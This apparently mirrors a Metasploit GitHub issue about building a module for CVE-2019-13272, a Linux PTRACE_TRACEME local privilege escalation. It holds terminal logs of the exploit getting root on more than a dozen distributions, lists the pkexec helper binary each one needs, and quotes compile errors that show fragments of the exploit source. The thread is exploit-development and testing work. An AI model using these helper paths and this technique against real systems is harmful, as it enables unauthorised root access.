Metasploit-framework: Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME (CVE-2019-13272)

Created on 18 Jul 2019  路  14Comments  路  Source: rapid7/metasploit-framework
hotness module
Source
picture bcoles

Most helpful comment

anyone who was able to make it work over SSH? POC?

picture rodneymullen2 on 25 Jul 2019
👍3

All 14 comments

Debian

Debian 10 (xfce)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@debian-10-0-0-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@debian-10-0-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(user)
root@debian-10-0-0-x64:/home/user/Desktop/47133#

Debian 9.4 (xfce)

/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper

user@debian9-4-0-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@debian9-4-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(lpadmin),117(scanner),1000(user)

Devuan 2.0.0 (xfce)

/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper

user@devuan-2-0-0:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@devuan-2-0-0:/home/user/Desktop/47133#

SparkyLinux 5 (lxqt)

/usr/bin/lxqt-backlight_backend

user@sparkylinux-5-x64:~/47133$ ./a.out 
executing passwd
attached to midpid
root@sparkylinux-5-x64:/home/user/47133# id
uid=0(root) gid=0(root) groups=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),104(scanner),107(lpadmin),113(netdev),114(bluetooth),1000(user)
root@sparkylinux-5-x64:/home/user/47133#

Ubuntu

Ubuntu 16.04.5 (unity)

/usr/lib/unity-settings-daemon/usd-backlight-helper

user@ubuntu-16-04-5-x64:~/Desktop/kernel-exploits/CVE-2019-13272$ ./a.out 
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[~] Using helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[.] Spawning suid process (/usr/bin/pkexec) ...
[.] Tracing midpid ...
[~] Attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-16-04-5-x64:/home/user/Desktop/kernel-exploits/CVE-2019-13272#

Ubuntu 18.04 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@ubuntu:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu:/home/user/Desktop/47133#

Ubuntu 19.04 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@ubuntu-19-04-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-19-04-x64:/home/user/Desktop/47133#

Ubuntu Mate 19.04 (mate)

/usr/sbin/mate-power-backlight-helper

user@ubuntu-mate-19-04-desktop-amd64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-mate-19-04-desktop-amd64:/home/user/Desktop/47133#

Linux Mint 19-v2 (mate)

/usr/sbin/mate-power-backlight-helper

user@linux-mint-19-2:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@linux-mint-19-2:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare),1000(user)
root@linux-mint-19-2:/home/user/Desktop/47133#

Elementary OS 0.4.1 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@elementary-os-0-4-1-20170517:~/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@elementary-os-0-4-1-20170517:/home/user/47133# exit

Fedora / CentOS / RHEL

Fedora 30 Workstation (gnome)

/usr/libexec/gsd-wacom-led-helper
/usr/libexec/gsd-wacom-oled-helper

[user@localhost CVE-2019-13272]$ ./a.out 
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/libexec/gsd-wacom-led-helper
[.] Spawning pkexec ...
[.] Tracing midpid ...
[~] Attached to midpid
[root@localhost CVE-2019-13272]# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Arch

Manjaro 18.0.3 (xfce)

/usr/bin/xfpm-power-backlight-helper

[user@manjaro-xfce-18-0-3-x86-64 47133]$ ./a.out 
executing passwd
attached to midpid
[manjaro-xfce-18-0-3-x86-64 47133]#

Mageia 6 (gnome)

/usr/libexec/gsd-backlight-helper

[user@localhost 47133]$ ./a.out 
executing passwd
attached to midpid
[root@localhost 47133]#

Antergos 18.7 (gnome)

Antergos was recently EOL (last release 2019-04-04)

/usr/lib/gsd-wacom-oled-helper
/usr/lib/gsd-backlight-helper

[user@antergos 47133]$ ./a.out 
executing passwd
attached to midpid
[root@antergos 47133]# id
uid=0(root) gid=0(root) groups=0(root),985(users),998(wheel)
[root@antergos 47133]# exit
bcoles picture bcoles on 18 Jul 2019

Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro?
I tried this briefly and unsuccessfully on Ubuntu 18.04

timwr picture timwr on 18 Jul 2019

Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro?
I tried this briefly and unsuccessfully on Ubuntu 18.04

Yes, I'll implement automatic targeting.

bcoles picture bcoles on 18 Jul 2019

I downloaded the poc without modifications and it reboots my device (android pie), any idea if Android is vulnerable and if not, why?

Auxilus picture Auxilus on 18 Jul 2019

fyi it works for me on ubuntu 18.04 as a logged in user, but not over ssh:

ssh user@vulnerable
user@ubuntu:~$ ./a.out
executing passwd
Error executing command as another user: Not authorized

This incident has been reported.

(I'm already logged in as the same user)

timwr picture timwr on 18 Jul 2019

fyi it works for me on ubuntu 18.04 as a logged in user, but not over ssh:

Correct. Console lock is not sufficient for pkexec. Need an active pkexec session.

bcoles picture bcoles on 18 Jul 2019
👍2

Updated C exploit here:

bcoles picture bcoles on 20 Jul 2019

anyone who was able to make it work over SSH? POC?

rodneymullen2 picture rodneymullen2 on 25 Jul 2019
👍3

are there any other binaries which meet the requirements like pkexec helpers which do not require active pkexec session? To make it work via ssh?

haqpl picture haqpl on 5 Aug 2019
👍1

Updated C exploit here:

Cannot compile in aarch64

MlgmXyysd picture MlgmXyysd on 9 Sep 2019

What's the error? What's the OS?

timwr picture timwr on 9 Sep 2019

What's the error? What's the OS?

CVE-2019-13272.c:181:24: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
    execl(pkexec_path, basename(pkexec_path), NULL);
                       ^
CVE-2019-13272.c:181:24: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
    execl(pkexec_path, basename(pkexec_path), NULL);
                       ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
                                          ^
CVE-2019-13272.c:198:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
                     ^
CVE-2019-13272.c:198:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
                     ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
                                          ^
CVE-2019-13272.c:215:38: error: no member named 'rsp' in 'struct user_regs_struct'; did you mean 'sp'?
  unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
                                     ^~~
                                     sp
/data/data/com.termux/files/usr/include/sys/user.h:242:12: note: 'sp' declared here
  uint64_t sp;
           ^
CVE-2019-13272.c:233:8: error: no member named 'orig_rax' in 'struct user_regs_struct'
  regs.orig_rax = __NR_execveat;
  ~~~~ ^
CVE-2019-13272.c:234:8: error: no member named 'rdi' in 'struct user_regs_struct'
  regs.rdi = exec_fd;
  ~~~~ ^
CVE-2019-13272.c:235:8: error: no member named 'rsi' in 'struct user_regs_struct'
  regs.rsi = scratch_area + offsetof(struct injected_page, path);
  ~~~~ ^
CVE-2019-13272.c:236:8: error: no member named 'rdx' in 'struct user_regs_struct'
  regs.rdx = scratch_area + offsetof(struct injected_page, argv);
  ~~~~ ^
CVE-2019-13272.c:237:8: error: no member named 'r10' in 'struct user_regs_struct'
  regs.r10 = scratch_area + offsetof(struct injected_page, envv);
  ~~~~ ^
CVE-2019-13272.c:238:8: error: no member named 'r8' in 'struct user_regs_struct'
  regs.r8 = AT_EMPTY_PATH;
  ~~~~ ^
CVE-2019-13272.c:258:17: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
  execlp(SHELL, basename(SHELL), NULL);
                ^
CVE-2019-13272.c:258:17: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
  execlp(SHELL, basename(SHELL), NULL);
                ^~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:105:44: note: passing argument to parameter '__arg0' here
int execlp(const char* __file, const char* __arg0, ...) __attribute__((__sentinel__));
                                           ^
CVE-2019-13272.c:406:6: warning: implicit declaration of function 'strchrnul' is invalid in C99 [-Wimplicit-function-declaration]
    *strchrnul(buf, '\n') = '\0';
     ^
CVE-2019-13272.c:406:5: error: indirection requires pointer operand ('int' invalid)
    *strchrnul(buf, '\n') = '\0';
    ^~~~~~~~~~~~~~~~~~~~~
CVE-2019-13272.c:407:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
    if (strncmp(buf, basename(helper_path), 15) == 0)
                     ^
CVE-2019-13272.c:407:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
    if (strncmp(buf, basename(helper_path), 15) == 0)
                     ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/string.h:137:44: note: passing argument to parameter '__rhs' here
int strncmp(const char* __lhs, const char* __rhs, size_t __n) __attribute_pure__;
                                           ^
9 warnings and 8 errors generated.
MlgmXyysd picture MlgmXyysd on 9 Sep 2019

What's the error? What's the OS?

Android Pie with Linux kernel 4.9.106, using Termux terminal environment.
gcc: clang-8

MlgmXyysd picture MlgmXyysd on 9 Sep 2019

This exploit doesn't work on Android

timwr picture timwr on 9 Sep 2019
Was this page helpful?
0 / 5 - 0 ratings

Related issues

Acidical picture Acidical  路  3Comments
handsomebeast picture handsomebeast  路  3Comments
bugshere picture bugshere  路  3Comments
0x27 picture 0x27  路  3Comments
Funeoz picture Funeoz  路  3Comments